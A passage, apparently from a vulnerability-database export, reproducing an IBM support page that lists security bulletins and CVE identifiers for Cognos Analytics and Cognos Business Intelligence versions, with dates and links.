"104BE807C8577FF816DF414B5A588FABB581711BB54758F6F49C7CAC17CD68BE", "href": "https://www.ibm.com/support/pages/node/261377", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T21:44:48", "description": "## Problem\n\nCognos Analytics and Cognos Business Intelligence Security Bulletins and Alerts.\n\n## Resolving The Problem\n\n## Tab navigation\n\n * CA 11.0.x\n * BI 10.2.2\n * BI 10.2.1\n * BI 10.2\n\nSecurity bulletins and Alerts for Cognos Analytics 11.0.x. 
\n**Published / Updated** | **Title** \n---|--- \nJanuary 2018 | [Cognos Analytics is affected by multiple vulnerabilities](<http://www.ibm.com/support/docview.wss?uid=swg22011561>) \nJanuary 2018 | [About the Libxml2 vulnerability in Cognos Analytics](<http://www.ibm.com/support/docview.wss?uid=swg22012361>) \nJanuary 2018 | [Cognos Analytics is affected by multiple vulnerabilities](<http://www.ibm.com/support/docview.wss?uid=swg22011810>) \nSeptember 2017 | [Cognos Analytics is affected by multiple vulnerabilities](<http://www.ibm.com/support/docview.wss?uid=swg22007242>) \nAugust 2017 | [Cognos Analytics is affected by a Cross-Site Scripting (XSS) vulnerability](<http://www.ibm.com/support/docview.wss?uid=swg22007549>) \nJuly 2017 | [Cognos Analytics is not affected by the Apache Xalan-Java vulnerability (CVE-2014-0107)](<http://www-01.ibm.com/support/docview.wss?uid=swg22005943>) \nJune 2017 | [Cognos Analytics is affected by a Cross-Site Scripting (XSS) vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg22004980>) \nMay 2017 | [Cognos Analytics is NOT AFFECTED by the OpenSource Bouncy Castle Vulnerability (CVE-2015-7940)](<http://www-01.ibm.com/support/docview.wss?uid=swg22003427>) \nMay 2017 | [Cognos Analytics is affected by CVE-2016-0398](<http://www-01.ibm.com/support/docview.wss?uid=swg21977070>) \nMay 2017 | [Cognos Analytics is affected by multiple vulnerabilities](<http://www-01.ibm.com/support/docview.wss?uid=swg22000095>) \nApril 2017 | [Cross Site Scripting (XSS) vulnerability affects Cognos Analytics](<http://www-01.ibm.com/support/docview.wss?uid=swg21999791>) \nMarch 2017 | [Cognos Analytics is affected by multiple vulnerabilities](<http://www-01.ibm.com/support/docview.wss?uid=swg21998887>) \nMarch 2017 | [Privilege Escalation vulnerability affects Cognos Analytics 
(CVE-2016-8960)](<http://www-01.ibm.com/support/docview.wss?uid=swg21993720>) \nJanuary 2017 | [A vulnerability in the GSKit component of Cognos Analytics (CVE-2016-0201)](<http://www-01.ibm.com/support/docview.wss?uid=swg21975045>) \nJanuary 2017 | [Cognos Analytics is affected by multiple vulnerabilities](<http://www-01.ibm.com/support/docview.wss?uid=swg21996417>) \n \nSecurity bulletins and Alerts for Cognos Business Intelligence 10.2.2. \n**Published / Updated**| **Title** \n---|--- \nJuly 2018| [IBM Cognos Business Intelligence Server is affected by multiple vulnerabilities](<http://www.ibm.com/support/docview.wss?uid=ibm10715641>) \nApril 2018| [Cognos Metrics Manager 2018 Q1 Security Update](<http://www.ibm.com/support/docview.wss?uid=swg22014720>) \nDecember 2017| [Multiple vulnerabilities in Libxml2 affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22011764>) \nDecember 2017| [Cognos Business Intelligence Server 2017Q4 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg22007952>) \nOctober 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22009441>) \nOctober 2017| [A vulnerability in the Apache Xerces-C XML Parser affects Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22009438>) \nOctober 2017| [Cognos Business Intelligence Server 2017Q3 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg22009259>) \nOctober 2017| [A vulnerability in the libpng library affects Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004076>) \nOctober 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004070>) \nJune 2017| [Cognos Business Intelligence Server 2017Q2 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg22004036>) \nMay 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics 
Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004078>) \nMay 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004077>) \nMay 2017| [A vulnerability in the GSKit library affects Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004075>) \nMay 2017| [Multiple vulnerabilities in OpenSSL affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004074>) \nMay 2017| [Cognos Business Intelligence is NOT AFFECTED by the OpenSource Bouncy Castle Vulnerability (CVE-2015-7940)](<http://www.ibm.com/support/docview.wss?uid=swg22003426>) \nApril 2017| [Vulnerability in IBM WebSphere Application Server affects Cognos Metrics Manager (CVE-2015-2017)](<http://www.ibm.com/support/docview.wss?uid=swg21976798>) \nApril 2017| [Multiple vulnerabilities in Apache HttpComponents affect Cognos Metrics Manager (CVE-2012-6153, CVE-2014-3577)](<http://www.ibm.com/support/docview.wss?uid=swg21970193>) \nMarch 2017| [Multiple vulnerabilities in Apache Tomcat affect Cognos Metrics Manager (CVE-2016-0762, CVE-2016-6816)](<http://www.ibm.com/support/docview.wss?uid=swg21999723>) \nMarch 2017| [A vulnerability in IBM Websphere Application Server affects Cognos Metrics Manager (CVE-2016-5983)](<http://www.ibm.com/support/docview.wss?uid=swg21999722>) \nMarch 2017| [Cognos Business Intelligence Server 2017Q1 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21999671>) \nMarch 2017| [Privilege Escalation vulnerability affects Cognos Business Intelligence (CVE-2016-8960)](<http://www.ibm.com/support/docview.wss?uid=swg21993718>) \nJanuary 2017| [Cognos Business Intelligence is affected by a vulnerability](<http://www.ibm.com/support/docview.wss?uid=swg21996809>) \nJanuary 2017| [Cognos Business Intelligence Server 2016Q4 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21995691>) \nJanuary 2017| [A vulnerability in IBM Java Runtime 
affects Cognos Metrics Manager (CVE-2016-3485)](<http://www.ibm.com/support/docview.wss?uid=swg21995206>) \nJanuary 2017| [Multiple vulnerabilities in libxml2 affect Cognos Metrics Manager (CVE-2016-3705, CVE-2016-4447, CVE-2016-4448)](<http://www.ibm.com/support/docview.wss?uid=swg21995198>) \nJanuary 2017| [Vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2016-6302 CVE-2016-6304 CVE-2016-6303 CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 CVE-2016-6306 CVE-2016-2181 CVE-2016-2183)](<http://www.ibm.com/support/docview.wss?uid=swg21993856>) \nJanuary 2017| [Cognos Business Intelligence Server 2016Q2 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21984323>) \nOctober 2016| [Cognos Business Intelligence Server 2016Q1 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21979767>) \nJuly 2016| [A vulnerability in the Apache Xerces-C XML parser affects Cognos Metrics Manager (CVE-2016-0729)](<http://www.ibm.com/support/docview.wss?uid=swg21986259>) \nJuly 2016| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2016-3427)](<http://www.ibm.com/support/docview.wss?uid=swg21985522>) \nJuly 2016| [A vulnerability in Apache Tomcat affects Cognos Metrics Manager (CVE-2015-5345)](<http://www.ibm.com/support/docview.wss?uid=swg21982821>) \nJuly 2016| [A vulnerability in OpenSSL affects Cognos Metrics Manager (CVE-2016-2106, CVE-2016-2107, CVE-2016-2108)](<http://www.ibm.com/support/docview.wss?uid=swg21977114>) \nMay 2016| [Cognos Business Intelligence Server is affected by CVE-2016-0398](<http://www.ibm.com/support/docview.wss?uid=swg21983247>) \nMay 2016| [Multiple vulnerabilities in libxml2 affect Cognos Metrics Manager (CVE-2015-1819, CVE-2015-5312, CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500, CVE-2015-7941, CVE-2015-7942, CVE-2015-8035, CVE-2015-8241, CVE-2015-8317)](<http://www.ibm.com/support/docview.wss?uid=swg21977221>) \nMay 2016| [Multiple vulnerabilities in IBM Java Runtime affect Cognos 
Metrics Manager (CVE-2016-0448, CVE-2016-0466)](<http://www.ibm.com/support/docview.wss?uid=swg21977134>) \nMarch 2016| [Multiple vulnerabilities in libpng affect Cognos Metrics Manager (CVE-2015-8126, CVE-2015-8472, CVE-2015-8540)](<http://www.ibm.com/support/docview.wss?uid=swg21976924>) \nFebruary 2016| [Several vulnerabilities in the libpng component of Cognos Business Intelligence Server (CVE-2015-8126, CVE-2015-8472, CVE-2015-8540)](<http://www.ibm.com/support/docview.wss?uid=swg21977053>) \nJanuary 2016| [A vulnerability in the GSKit component of Cognos Business Intelligence Server (CVE-2016-0201)](<http://www.ibm.com/support/docview.wss?uid=swg21975044>) \nJanuary 2016| [A vulnerability in the GSKit component of Cognos Metrics Manager (CVE-2016-0201)](<http://www.ibm.com/support/docview.wss?uid=swg21974810>) \nNovember 2015| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2015-4872)](<http://www.ibm.com/support/docview.wss?uid=swg21971753>) \nNovember 2015| [Vulnerability in Apache Commons affects Cognos Metrics Manager (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21971382>) \nNovember 2015| [Cognos Business Intelligence Server 2015Q4 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21959874>) \nAugust 2015| [Cognos Business Intelligence Server 2015Q3 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21963468>) \nAugust 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2015-2625, CVE-2015-4748, CVE-2015-4749)](<http://www.ibm.com/support/docview.wss?uid=swg21963263>) \nAugust 2015| [Vulnerability in Tomcat affects Cognos Metrics Manager (CVE-2014-0230)](<http://www.ibm.com/support/docview.wss?uid=swg21962903>) \nAugust 2015| [Vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2015-1789, CVE-2015-1790, CVE-2015-1792)](<http://www.ibm.com/support/docview.wss?uid=swg21962686>) \nAugust 2015| [Vulnerability in RC4 stream cipher affects 
Cognos Business Intelligence Server (CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21715530>) \nJuly 2015| [Vulnerability in Diffie-Hellman ciphers affects Cognos Mobile app on Android (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21959481>) \nJuly 2015| [Cognos Business Intelligence Server 2015Q2 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21903752>) \nJuly 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2015-0478, CVE-2015-0488, CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21903565>) \nJuly 2015| [Vulnerability in Tomcat affects Cognos Metrics Manager (CVE-2014-0227)](<http://www.ibm.com/support/docview.wss?uid=swg21903036>) \nJuly 2015| [Vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2015-0286, CVE-2015-0287, CVE-2015-0288, CVE-2015-0289, CVE-2015-0293)](<http://www.ibm.com/support/docview.wss?uid=swg21902528>) \nJune 2015| [Vulnerability in Diffie-Hellman ciphers affects Cognos Metrics Manager (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21959812>) \nJune 2015| [Vulnerability in Diffie-Hellman ciphers affects Cognos Business Intelligence (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21959671>) \nMay 2015| [A vulnerability in the IBM Dojo Toolkit affects Cognos Business Intelligence (CVE-2014-8917)](<http://www.ibm.com/support/docview.wss?uid=swg21700709>) \nMay 2015| [A vulnerability in the IBM Dojo Toolkit affects Cognos Metrics Manager (CVE-2014-8917)](<http://www.ibm.com/support/docview.wss?uid=swg21697317>) \nApril 2015| [Vulnerability in RC4 stream cipher affects Cognos Mobile app on Android (CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21883588>) \nApril 2015| [Vulnerability in RC4 stream cipher affects Cognos Metrics Manager (CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21720187>) \nApril 2015| [Vulnerability exists in GSKit that affects Cognos Metrics 
Manager (CVE-2015-0159)](<http://www.ibm.com/support/docview.wss?uid=swg21701318>) \nApril 2015| [Vulnerability in IBM WebSphere Application Server affects Cognos Metrics Manager (CVE-2015-0138)](<http://www.ibm.com/support/docview.wss?uid=swg21701222>) \nApril 2015| [Vulnerabilities in IBM WebSphere Application Server and GSKit affects Cognos Business Intelligence (CVE-2015-0138, CVE-2015-0159)](<http://www.ibm.com/support/docview.wss?uid=swg21701210>) \nApril 2015| [Vulnerability in IBM Runtime Environment Java Technology Edition affects Cognos Business Intelligence Server (CVE-2015-0138)](<http://www.ibm.com/support/docview.wss?uid=swg21701200>) \nApril 2015| [Vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2015-0138)](<http://www.ibm.com/support/docview.wss?uid=swg21701192>) \nMarch 2015| [Cognos Business Intelligence Server is affected by multiple vulnerabilities](<http://www.ibm.com/support/docview.wss?uid=swg21698818>) \nMarch 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2015-0410, CVE-2014-6593)](<http://www.ibm.com/support/docview.wss?uid=swg21698154>) \nMarch 2015| [Multiple vulnerabilities in the Libpng library affect Cognos Metrics Manager (CVE-2015-0973, CVE-2014-9495)](<http://www.ibm.com/support/docview.wss?uid=swg21697296>) \nMarch 2015| [Multiple vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2014-3569, CVE-2014-3570, CVE-2014-3571, CVE-2014-3572, CVE-2014-8275, CVE-2015-0204)](<http://www.ibm.com/support/docview.wss?uid=swg21695694>) \nMarch 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2014-3566, CVE-2014-6457)](<http://www.ibm.com/support/docview.wss?uid=swg21691561>) \nFebruary 2015| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2014-4263)](<http://www.ibm.com/support/docview.wss?uid=swg21688596>) \nJanuary 2015| [TLS padding vulnerability affects Cognos Business Intelligence 
(CVE-2014-8730)](<http://www.ibm.com/support/docview.wss?uid=swg21693422>) \nJanuary 2015| [TLS padding vulnerability affects Cognos Metrics Manager (CVE-2014-8730)](<http://www.ibm.com/support/docview.wss?uid=swg21693182>) \nDecember 2014| [Cognos Business Intelligence Server is affected by multiple vulnerabilities (CVE-2014-3566, CVE-2014-6145, CVE-2014-1568, CVE-2014-4263, CVE-2012-5784, CVE-2014-3513, CVE-2014-3567 and CVE-2014-3568)](<http://www.ibm.com/support/docview.wss?uid=swg21692267>) \nDecember 2014| [A vulnerability in the Mozilla Network Security Services (NSS) affects Cognos Metrics Manager (CVE-2014-1568)](<http://www.ibm.com/support/docview.wss?uid=swg21691656>) \nDecember 2014| [A vulnerability in Apache Axis affects Cognos Metrics Manager (CVE-2012-5784)](<http://www.ibm.com/support/docview.wss?uid=swg21691655>) \nDecember 2014| [Multiple vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2014-3567, CVE-2014-3513, CVE-2014-3568)](<http://www.ibm.com/support/docview.wss?uid=swg21689333>) \n \nSecurity bulletins and Alerts for Cognos Business Intelligence 10.2.1. 
\n--- \n**Published / Updated**| **Title** \nApril 2018| [Cognos Metrics Manager 2018 Q1 Security Update](<http://www.ibm.com/support/docview.wss?uid=swg22014720>) \nDecember 2017| [Multiple vulnerabilities in Libxml2 affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22011764>) \nDecember 2017| [Cognos Business Intelligence Server 2017Q4 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg22007952>) \nOctober 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22009441>) \nOctober 2017| [A vulnerability in the Apache Xerces-C XML Parser affects Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22009438>) \nOctober 2017| [Cognos Business Intelligence Server 2017Q3 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg22009259>) \nOctober 2017| [A vulnerability in the libpng library affects Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004076>) \nOctober 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004070>) \nJune 2017| [Cognos Business Intelligence Server 2017Q2 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg22004036>) \nMay 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004078>) \nMay 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004077>) \nMay 2017| [Multiple vulnerabilities in OpenSSL affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004074>) \nMay 2017| [Cognos Business Intelligence is NOT AFFECTED by the OpenSource Bouncy Castle Vulnerability (CVE-2015-7940)](<http://www.ibm.com/support/docview.wss?uid=swg22003426>) \nApril 2017| [Multiple vulnerabilities in Apache HttpComponents affect 
Cognos Metrics Manager (CVE-2012-6153, CVE-2014-3577)](<http://www.ibm.com/support/docview.wss?uid=swg21970193>) \nMarch 2017| [Multiple vulnerabilities in Apache Tomcat affect Cognos Metrics Manager (CVE-2016-0762, CVE-2016-6816)](<http://www.ibm.com/support/docview.wss?uid=swg21999723>) \nMarch 2017| [Cognos Business Intelligence Server 2017Q1 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21999671>) \nMarch 2017| [Privilege Escalation vulnerability affects Cognos Business Intelligence (CVE-2016-8960)](<http://www.ibm.com/support/docview.wss?uid=swg21993718>) \nJanuary 2017| [Cognos Business Intelligence is affected by a vulnerability](<http://www.ibm.com/support/docview.wss?uid=swg21996809>) \nJanuary 2017| [Cognos Business Intelligence Server 2016Q4 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21995691>) \nJanuary 2017| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2016-3485)](<http://www.ibm.com/support/docview.wss?uid=swg21995206>) \nJanuary 2017| [Multiple vulnerabilities in libxml2 affect Cognos Metrics Manager (CVE-2016-3705, CVE-2016-4447, CVE-2016-4448)](<http://www.ibm.com/support/docview.wss?uid=swg21995198>) \nJanuary 2017| [Vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2016-6302 CVE-2016-6304 CVE-2016-6303 CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 CVE-2016-6306 CVE-2016-2181 CVE-2016-2183)](<http://www.ibm.com/support/docview.wss?uid=swg21993856>) \nJanuary 2017| [Cognos Business Intelligence Server 2016Q2 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21984323>) \nOctober 2016| [Cognos Business Intelligence Server 2016Q1 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21979767>) \nJuly 2016| [A vulnerability in the Apache Xerces-C XML parser affects Cognos Metrics Manager (CVE-2016-0729)](<http://www.ibm.com/support/docview.wss?uid=swg21986259>) \nJuly 2016| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager 
(CVE-2016-3427)](<http://www.ibm.com/support/docview.wss?uid=swg21985522>) \nJuly 2016| [A vulnerability in Apache Tomcat affects Cognos Metrics Manager (CVE-2015-5345)](<http://www.ibm.com/support/docview.wss?uid=swg21982821>) \nJuly 2016| [A vulnerability in OpenSSL affects Cognos Metrics Manager (CVE-2016-2106, CVE-2016-2107, CVE-2016-2108)](<http://www.ibm.com/support/docview.wss?uid=swg21977114>) \nMay 2016| [Cognos Business Intelligence Server is affected by CVE-2016-0398](<http://www.ibm.com/support/docview.wss?uid=swg21983247>) \nMay 2016| [Multiple vulnerabilities in libxml2 affect Cognos Metrics Manager (CVE-2015-1819, CVE-2015-5312, CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500, CVE-2015-7941, CVE-2015-7942, CVE-2015-8035, CVE-2015-8241, CVE-2015-8317)](<http://www.ibm.com/support/docview.wss?uid=swg21977221>) \nMay 2016| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2016-0448, CVE-2016-0466)](<http://www.ibm.com/support/docview.wss?uid=swg21977134>) \nMarch 2016| [Multiple vulnerabilities in libpng affect Cognos Metrics Manager (CVE-2015-8126, CVE-2015-8472, CVE-2015-8540)](<http://www.ibm.com/support/docview.wss?uid=swg21976924>) \nFebruary 2016| [Several vulnerabilities in the libpng component of Cognos Business Intelligence Server (CVE-2015-8126, CVE-2015-8472, CVE-2015-8540)](<http://www.ibm.com/support/docview.wss?uid=swg21977053>) \nNovember 2015| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2015-4872)](<http://www.ibm.com/support/docview.wss?uid=swg21971753>) \nNovember 2015| [Vulnerability in Apache Commons affects Cognos Metrics Manager (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21971382>) \nNovember 2015| [Cognos Business Intelligence Server 2015Q4 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21959874>) \nAugust 2015| [Cognos Business Intelligence Sever 2015Q3 Security 
Updater](<http://www.ibm.com/support/docview.wss?uid=swg21963468>) \nAugust 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2015-2625, CVE-2015-4748, CVE-2015-4749)](<http://www.ibm.com/support/docview.wss?uid=swg21963263>) \nAugust 2015| [Vulnerability in Tomcat affects Cognos Metrics Manager (CVE-2014-0230)](<http://www.ibm.com/support/docview.wss?uid=swg21962903>) \nAugust 2015| [Vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2015-1789, CVE-2015-1790, CVE-2015-1792)](<http://www.ibm.com/support/docview.wss?uid=swg21962686>) \nAugust 2015| [Vulnerability in RC4 stream cipher affects Cognos Business Intelligence Server (CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21715530>) \nJuly 2015| [Vulnerability in Diffie-Hellman ciphers affects Cognos Mobile app on Android (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21959481>) \nJuly 2015| [Cognos Business Intelligence Sever 2015Q2 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21903752>) \nJuly 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2015-0478, CVE-2015-0488, CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21903565>) \nJuly 2015| [Vulnerability in Tomcat affects Cognos Metrics Manager (CVE-2014-0227)](<http://www.ibm.com/support/docview.wss?uid=swg21903036>) \nJuly 2015| [Vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2015-0286, CVE-2015-0287, CVE-2015-0288, CVE-2015-0289, CVE-2015-0293)](<http://www.ibm.com/support/docview.wss?uid=swg21902528>) \nJune 2015| [Vulnerability in Diffie-Hellman ciphers affects Cognos Metrics Manager (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21959812>) \nJune 2015| [Vulnerability in Diffie-Hellman ciphers affects Cognos Business Intelligence (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21959671>) \nMay 2015| [A vulnerability in the IBM Dojo Toolkit affects Cognos 
Business Intelligence (CVE-2014-8917)](<http://www.ibm.com/support/docview.wss?uid=swg21700709>) \nMay 2015| [A vulnerability in the IBM Dojo Toolkit affects Cognos Metrics Manager (CVE-2014-8917)](<http://www.ibm.com/support/docview.wss?uid=swg21697317>) \nApril 2015| [Vulnerability in RC4 stream cipher affects Cognos Mobile app on Android (CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21883588>) \nApril 2015| [Vulnerability in RC4 stream cipher affects Cognos Metrics Manager (CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21720187>) \nApril 2015| [Vulnerabilities in IBM WebSphere Application Server and GSKit affects Cognos Business Intelligence (CVE-2015-0138, CVE-2015-0159)](<http://www.ibm.com/support/docview.wss?uid=swg21701210>) \nApril 2015| [Vulnerability in IBM Runtime Environment Java Technology Edition affects Cognos Business Intelligence Server (CVE-2015-0138)](<http://www.ibm.com/support/docview.wss?uid=swg21701200>) \nApril 2015| [Vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2015-0138)](<http://www.ibm.com/support/docview.wss?uid=swg21701192>) \nMarch 2015| [Cognos Business Intelligence Server is affected by multiple vulnerabilities](<http://www.ibm.com/support/docview.wss?uid=swg21698818>) \nMarch 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2015-0410, CVE-2014-6593)](<http://www.ibm.com/support/docview.wss?uid=swg21698154>) \nMarch 2015| [Multiple vulnerabilities in the Libpng library affect Cognos Metrics Manager (CVE-2015-0973, CVE-2014-9495)](<http://www.ibm.com/support/docview.wss?uid=swg21697296>) \nMarch 2015| [Multiple vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2014-3569, CVE-2014-3570, CVE-2014-3571, CVE-2014-3572, CVE-2014-8275, CVE-2015-0204)](<http://www.ibm.com/support/docview.wss?uid=swg21695694>) \nMarch 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2014-3566, 
CVE-2014-6457)](<http://www.ibm.com/support/docview.wss?uid=swg21691561>) \nFebruary 2015| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2014-4263)](<http://www.ibm.com/support/docview.wss?uid=swg21688596>) \nJanuary 2015| [TLS padding vulnerability affects Cognos Business Intelligence (CVE-2014-8730)](<http://www.ibm.com/support/docview.wss?uid=swg21693422>) \nDecember 2014| [Cognos Business Intelligence Server is affected by multiple vulnerabilities (CVE-2014-3566, CVE-2014-6145, CVE-2014-1568, CVE-2014-4263, CVE-2012-5784, CVE-2014-3513, CVE-2014-3567 and CVE-2014-3568)](<http://www.ibm.com/support/docview.wss?uid=swg21692267>) \nDecember 2014| [A vulnerability in the Mozilla Network Security Services (NSS) affects Cognos Metrics Manager (CVE-2014-1568)](<http://www.ibm.com/support/docview.wss?uid=swg21691656>) \nDecember 2014| [A vulnerability in Apache Axis affects Cognos Metrics Manager (CVE-2012-5784)](<http://www.ibm.com/support/docview.wss?uid=swg21691655>) \nDecember 2014| [Multiple vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2014-3567, CVE-2014-3513, CVE-2014-3568)](<http://www.ibm.com/support/docview.wss?uid=swg21689333>) \nNovember 2014| [Cognos BI Server is affected by the following vulnerabilities: CVE-2014-0107, CVE-2014-0075, CVE-2014-0096, CVE-2014-0099, CVE-2014-0119, CVE-2014-0878, CVE-2014-0460](<http://www.ibm.com/support/docview.wss?uid=swg21682740>) \nSeptember 2014| [Cognos Business Intelligence is not affected by the Bash vulnerabilities (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and CVE-2014-6278)](<http://www.ibm.com/support/docview.wss?uid=swg21685556>) \nSeptember 2014| [Cognos Metrics Manager is affected by the following IBM Java Runtime vulnerabilities: CVE-2014-0878, CVE-2014-0460](<http://www.ibm.com/support/docview.wss?uid=swg21683527>) \nSeptember 2014| [Cognos Metrics Manager is affected by a vulnerability in Apache Xalan-Java 
(CVE-2014-0107)](<http://www.ibm.com/support/docview.wss?uid=swg21683524>) \nSeptember 2014| [Cognos Metrics Manager is affected by the following Tomcat vulnerabilities: CVE-2014-0075, CVE-2014-0096, CVE-2014-0099, CVE-2014-0119](<http://www.ibm.com/support/docview.wss?uid=swg21683430>) \nSeptember 2014| [OpenSSL Heartbleed Vulnerability](<http://www.ibm.com/support/docview.wss?uid=swg21669823>) \nAugust 2014| [Cognos Metrics Manager is affected by the following OpenSSL vulnerabilities: CVE-2014-0224](<http://www.ibm.com/support/docview.wss?uid=swg21677225>) \nJuly 2014| [Cognos BI Server is affected by the following OpenSSL vulnerability: CVE-2014-0224](<http://www.ibm.com/support/docview.wss?uid=swg21680511>) \nJuly 2014| [Security vulnerabilities have been identified in IBM DB2 shipped with Cognos Business Intelligence (CVE-2013-6747, CVE-2014-0963)](<http://www.ibm.com/support/docview.wss?uid=swg21674489>) \nJuly 2014| [A security vulnerability has been identified in IBM WebSphere Application Server shipped with Cognos Business Intelligence (CVE-2014-0114)](<http://www.ibm.com/support/docview.wss?uid=swg21674099>) \nMay 2014| [Multiple security exposures in Cognos BI Server (CVE-2014-0416, CVE-2014-0423, CVE-2013-4322)](<http://www.ibm.com/support/docview.wss?uid=swg21671340>) \nMarch 2014| [Multiple security exposures in Cognos BI Server (CVE-2013-6954, CVE-2013-6732, CVE-2013-5802, CVE-2013-5825, CVE-2014-0854, CVE-2014-0861)](<http://www.ibm.com/support/docview.wss?uid=swg21662856>) \nNovember 2013| [Cognos Business Intelligence (CVE-2013-3030, CVE-2013-4002, CVE-2013-2407, CVE-2013-2450, CVE-2013-4034, CVE-2013-5372)](<http://www.ibm.com/support/docview.wss?uid=swg21652590>) \n \nSecurity bulletins and Alerts for Cognos Business Intelligence 10.2. 
